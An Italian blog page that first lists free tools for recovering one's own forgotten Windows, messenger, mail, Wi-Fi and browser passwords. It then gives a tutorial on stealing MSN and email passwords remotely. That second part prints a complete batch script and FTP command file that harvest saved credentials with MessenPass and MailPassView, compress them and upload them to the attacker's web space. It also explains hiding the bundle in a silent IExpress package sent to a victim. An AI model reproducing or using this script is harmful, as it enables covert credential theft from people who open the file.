Recupera le password perdute

ACCESSO NEGATO. Queste due parole sono l’ultima cosa che vorreste vedere quando state cercando di accedere a un sistema o aprire un file. Esistono vari strumenti gratuiti in grado di aiutarvi a trovare la password perduta che non ricordate o che il vostro computer ha in memoria ma oscurata.

Diamo un occhiata ad alcuni rimedi per le password smarrite di comuter, rete o per capire cosa c’è dietro la stringa di asterischi.

Prima di cominciare due cose: Primo, utilizzare l’articolo per recuperare la propria password, o per aiutare il tuo parente o amico con il loro consenso, non per ficcanasare i fatti altrui (non chiedetemi via mail di scoprire la passw di un amico/a x vendette personali!). Secondo, al fine di evitare di perdere di nuovo le password, utilizzate utility-banche dati come KeePass (recensione + guida di LifeHacker).

Windows

Quando non è possibile accedere a quel vecchio PC Windows non hai toccato in anni, provare a fare il boot usando il Ophcrack Live CD. Ophcrack rileva i nomi degli utenti e le rispettive password di accesso a Windows. Ophcrack è disponibile per Xp o Vista. Guarda gli screenshot di LifeHacker su come Ophcrack lavora.

Applicazioni Windows

Quando hai salvato la tua password nel tuo software di FTP, Messenger o altre applicazioni che tengono la password nascosta da asterischi e vuoi scoprire cosa c’è sotto, usa Nirsoft’s Asterisk Logger e scoprirai la password sotto gli ******.

Microsoft Outlook PST (Personal Folders) files: Per un vecchio archivio email che hai bloccato con una password che non ricordi, prova PstPassword (guida LifeHacker). Questa utility gratuita offre tre possibili password per aprire i file PST.

messenpass.pngInstant Messenger passwords: Hai perso la uta password di MSN Messenger, Google Talk, AIM, Yahoo Messenger, Trillian, Miranda, or Pidgin  ma sei loggato e ha isalvato la password nel tuo  computer? MessenPass te le mostra!

Network and Wireless Router Passwords:

Guarda le password che il tuo computer stà mandando tramite la rete con SniffPass. SniffPass rivela le passwords per POP3, IMAP4, SMTP, FTP, and HTTP.

Rivela le password di reti Wi-Fi:  WirelessKeyView (post di LifeHacker) rivela le password di reti Wi-Fi salvate su Windows.

Default router password: Se devi accedere ad un router a pensi che la password sia quella di default, cerca qui le password di default dei router di varie marche.

Mac OS X

Siccome password cracker per Mac non esistono che sappia (correggetemi se sbaglio!), Mac Keychain è l’unico modo per rivelare un pò di password che hai salvato nel sistema. Cerca Keychain su Applicazioni/Utilities. Dovrai digitare la password di amministratore per ma ora puoi vedere tutte le password.

Firefox Saved Browser passwords

Se salvi le passw di siti web in Firefox, è facile vederle. In Firefox, Dal menù Opzioni andate nella scheda sicurezza nel bottone “Password salvate”, quindi clic su mostra passw. (Per evitare che chiunque le veda impostate una password generale).

Annunci

Come rubare password di MSN e di una casella mail da remoto usando MessenPass e MailPassView

In questo primo post vi spiego come usare i programmini “MessenPass” e “MailPassView“, quelli usati in quel famoso metodo per rubare le password via penna USB.

Bene per chi non lo sapesse questi due programmini servono per recuperare le password dimenticate di Msn o di account mail memorizzate su una macchina.

Adesso vi dimostro come è possibile utilizzarli per rubare le password salvate senza avere accesso fisico alla macchina.

Il pirata informatico si serve di: uno spazio web, il programma “MessenPass”, “MailPassView”,(vedi qui su come usare anche altri programmi, stà tutto nel mettere l’eseguibile con “/sverhtml “nel batch) il file eseguibile di WinRar(installatelo e prelevate da c:/programmi/winrar/rar.exe), un editor di testo qualsiasi per scrivere il file start.bat e il file ftp.txt.

Per uno spazio web è necessario uno con accesso ftp (es.netsons.org) in cui registrarsi e abilitare l’ftp se necesario. Potete usare FileZilla per la gestione ftp.

Il codice del file start.bat:

@echo off
messenpass.exe /sverhtml Password-MSN.html //scrive l’output di messenpass in un file html
mailpassview.exe /sverhtml Password-Outlock.html //scrive l’output di mailpasspreview in un file html
rar.exe a archvio.rar *.html //comprime i due file html contenenti le password in una archivio
md c:\temp //crea la cartella temporanea
copy ftp.txt C:\temp //copia il file ftp.txt nella catella temporanea
copy *.rar c:\temp //copia il file rar nella cartella temporanea
cd c:\temp //si posiziona nella cartella temporanea
ftp -v -i -s:ftp.txt //avvia la sessione ftp con lo spazio web e permette di eseguire i comandi contenuti nel file di testo
del ftp.txt //elimina il file ftp che contiene i dati di accesso e i comandi dalla cartella temporanea
del *.rar //emilina i file rar nella cartella temporanea

Il contenuto del file ftp.txt:

open tuositoftp.org //l'host dello spazio web
tuouserftp //l’username dello spazio web
tuapasswordftp //la password dello spazio web
cd msn //cartella che conterrà i log
lcd c:\temp //si posiziona nella cartella locale temporanea
BINARY //imposta il trasferimento di file di tipo binario
mput *.rar //trasferisce i file rar allo spazio web
bye
//chiude la sessione ftp

Il pirata tramite ftp crea una cartella chiamata “msn” dove riceverà il file compresso che contiene le password, successivamente invierà alla sua vittima tutti questi programmi compressi con iexpress.

Iexpress è un software di casa Microsoft, potete usarlo seguendo il procedimento: start->esegui->digitare “iexpress”(senza virgolette)->PREMERE INVIO.

Ovviamente ho scritto il codice con degli errori in modo tale da non poter essere usato con iexpress, questo evita l’uso spropositato ai lamer di turno.

Iexpress permette di autoestrarre dei file in modalità nascosta “hidden” quindi la vittima quando apre il file non si accorge di niente,nessuna finestra, nessun errore, non da segno di vita alcuna, la vittima è convinta che il file non funziona.

Il pirata non invierebbe mai i file senza averli prima compressi e nascosti, perchè il file ftp.txt contiene i dati di login al suo spazio web.

Due consigli:

non memorizzate le password sul vostro computer ma riscrivetele ogni volta;

se siete troppo pigri e non volete rinunciare alla comodità della password salvata vi consiglio di non aprire file eseguibili ricevuti via email o via Messenger che non siano di fonte certa, poichè potrebbero contenere questi file maligni! D

Abbastanza facile no?

Foto di neingeist su flickr.com

Fonte underground0